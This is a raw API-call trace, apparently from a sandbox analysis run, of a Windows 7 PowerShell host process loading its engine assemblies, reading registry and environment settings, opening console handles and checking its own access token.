	[0322.301] CoTaskMemAlloc (cb=0x20) returned 0x361340
	[0322.301] lstrcpyW (in: lpString1=0x361340, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0322.301] CoTaskMemFree (pv=0x361340) 
	[0322.301] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x2ad4f50, puLen=0xcdb30) returned 1
	[0322.301] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0322.301] CoTaskMemAlloc (cb=0x44) returned 0x369ed0
	[0322.301] lstrcpyW (in: lpString1=0x369ed0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0322.301] CoTaskMemFree (pv=0x369ed0) 
	[0322.301] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x2ad4fb8, puLen=0xcdb30) returned 1
	[0322.301] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0322.301] CoTaskMemAlloc (cb=0x76) returned 0x3043d0
	[0322.301] lstrcpyW (in: lpString1=0x3043d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0322.301] CoTaskMemFree (pv=0x3043d0) 
	[0322.302] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x2ad5054, puLen=0xcdb30) returned 1
	[0322.302] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0322.302] CoTaskMemAlloc (cb=0x44) returned 0x369ed0
	[0322.302] lstrcpyW (in: lpString1=0x369ed0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0322.302] CoTaskMemFree (pv=0x369ed0) 
	[0322.302] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x2ad50b8, puLen=0xcdb30) returned 1
	[0322.302] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0322.302] CoTaskMemAlloc (cb=0x58) returned 0x2cd770
	[0322.302] lstrcpyW (in: lpString1=0x2cd770, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0322.302] CoTaskMemFree (pv=0x2cd770) 
	[0322.302] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x2ad5134, puLen=0xcdb30) returned 1
	[0322.302] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0322.302] CoTaskMemAlloc (cb=0x20) returned 0x361340
	[0322.302] lstrcpyW (in: lpString1=0x361340, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0322.302] CoTaskMemFree (pv=0x361340) 
	[0322.302] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x2ad4ddc, puLen=0xcdb30) returned 1
	[0322.302] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0322.302] CoTaskMemAlloc (cb=0x66) returned 0x359490
	[0322.303] lstrcpyW (in: lpString1=0x359490, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0322.303] CoTaskMemFree (pv=0x359490) 
	[0322.303] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x0, puLen=0xcdb30) returned 0
	[0322.303] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x0, puLen=0xcdb30) returned 0
	[0322.303] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x0, puLen=0xcdb30) returned 0
	[0322.303] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2ad4d84, puLen=0xcdb00) returned 1
	[0322.303] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0322.303] VerLanguageNameW (in: wLang=0x0, szLang=0x309530, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0322.303] CoTaskMemFree (pv=0x309530) 
	[0322.303] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\", lplpBuffer=0xcdb58, puLen=0xcdb50 | out: lplpBuffer=0xcdb58*=0x2ad4d10, puLen=0xcdb50) returned 1
	[0322.312] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0322.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.312] CoTaskMemFree (pv=0x34eb50) 
	[0322.317] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0322.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.317] CoTaskMemFree (pv=0x34eb50) 
	[0322.322] lstrlenW (lpString="䅁") returned 1
	[0322.644] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcda28 | out: phkResult=0xcda28*=0x304) returned 0x0
	[0322.645] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcda18 | out: phkResult=0xcda18*=0x308) returned 0x0
	[0322.645] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdaa8 | out: phkResult=0xcdaa8*=0x30c) returned 0x0
	[0322.650] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd9ec, lpData=0x0, lpcbData=0xcd9e8*=0x0 | out: lpType=0xcd9ec*=0x1, lpData=0x0, lpcbData=0xcd9e8*=0x56) returned 0x0
	[0322.651] CoTaskMemAlloc (cb=0x5a) returned 0x359420
	[0322.651] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd9bc, lpData=0x359420, lpcbData=0xcd9b8*=0x56 | out: lpType=0xcd9bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd9b8*=0x56) returned 0x0
	[0322.651] CoTaskMemFree (pv=0x359420) 
	[0322.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.685] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0322.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.685] CoTaskMemFree (pv=0x34eb50) 
	[0324.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0324.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0325.927] CoTaskMemAlloc (cb=0x104) returned 0x34ec60
	[0325.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ec60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.927] CoTaskMemFree (pv=0x34ec60) 
	[0325.929] CoTaskMemAlloc (cb=0x104) returned 0x34ec60
	[0325.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ec60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.929] CoTaskMemFree (pv=0x34ec60) 
	[0326.861] CoTaskMemAlloc (cb=0x104) returned 0x34ec60
	[0326.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ec60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.861] CoTaskMemFree (pv=0x34ec60) 
	[0326.863] CoTaskMemAlloc (cb=0x104) returned 0x34ec60
	[0326.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ec60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.863] CoTaskMemFree (pv=0x34ec60) 
	[0326.863] CoTaskMemAlloc (cb=0x104) returned 0x34ec60
	[0326.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ec60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.863] CoTaskMemFree (pv=0x34ec60) 
	[0328.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0328.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0328.708] CoTaskMemAlloc (cb=0x104) returned 0x34ec60
	[0328.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ec60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.709] CoTaskMemFree (pv=0x34ec60) 
	[0328.712] CoTaskMemAlloc (cb=0x104) returned 0x34ec60
	[0328.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ec60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.712] CoTaskMemFree (pv=0x34ec60) 
	[0329.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0329.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0335.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0336.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0336.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0337.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0337.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0339.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0339.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0339.703] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0339.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.703] CoTaskMemFree (pv=0x34ee80) 
	[0339.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0339.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0339.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0340.605] SetErrorMode (uMode=0x1) returned 0x1
	[0340.605] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd980 | out: lpFileInformation=0xcd980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0340.605] SetErrorMode (uMode=0x1) returned 0x1
	[0342.456] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0342.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.456] CoTaskMemFree (pv=0x34ee80) 
	[0342.879] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0342.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.879] CoTaskMemFree (pv=0x34ee80) 
	[0342.880] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0342.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.880] CoTaskMemFree (pv=0x34ee80) 
	[0342.883] CoCreateGuid (in: pguid=0xcdd48 | out: pguid=0xcdd48*(Data1=0x8843e50b, Data2=0xea55, Data3=0x4cb3, Data4=([0]=0x8b, [1]=0x4d, [2]=0x8d, [3]=0x8c, [4]=0x88, [5]=0x45, [6]=0x47, [7]=0x29))) returned 0x0
	[0342.885] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0342.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.886] CoTaskMemFree (pv=0x34ee80) 
	[0342.888] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0342.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.888] CoTaskMemFree (pv=0x34ee80) 
	[0342.891] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0342.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.891] CoTaskMemFree (pv=0x34ee80) 
	[0342.896] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0342.898] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd9f0 | out: lpConsoleScreenBufferInfo=0xcd9f0) returned 1
	[0342.903] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0342.904] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd9f0 | out: lpConsoleScreenBufferInfo=0xcd9f0) returned 1
	[0342.905] GetVersionExW (in: lpVersionInformation=0xcd980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0342.908] GetCurrentProcess () returned 0xffffffffffffffff
	[0342.909] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcda18 | out: TokenHandle=0xcda18*=0x320) returned 1
	[0342.912] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd938 | out: TokenInformation=0x0, ReturnLength=0xcd938) returned 0
	[0342.913] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c7290
	[0342.913] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x2c7290, TokenInformationLength=0x4, ReturnLength=0xcd938 | out: TokenInformation=0x2c7290, ReturnLength=0xcd938) returned 1
	[0342.914] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcda98 | out: phNewToken=0xcda98*=0x31c) returned 1
	[0342.915] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd938 | out: TokenInformation=0x0, ReturnLength=0xcd938) returned 0
	[0342.915] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c72c0
	[0342.915] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x2c72c0, TokenInformationLength=0x4, ReturnLength=0xcd938 | out: TokenInformation=0x2c72c0, ReturnLength=0xcd938) returned 1
	[0342.916] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2bafa90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcdaa8 | out: IsMember=0xcdaa8) returned 1
	[0342.916] CloseHandle (hObject=0x31c) returned 1
	[0342.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0342.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0342.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0342.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
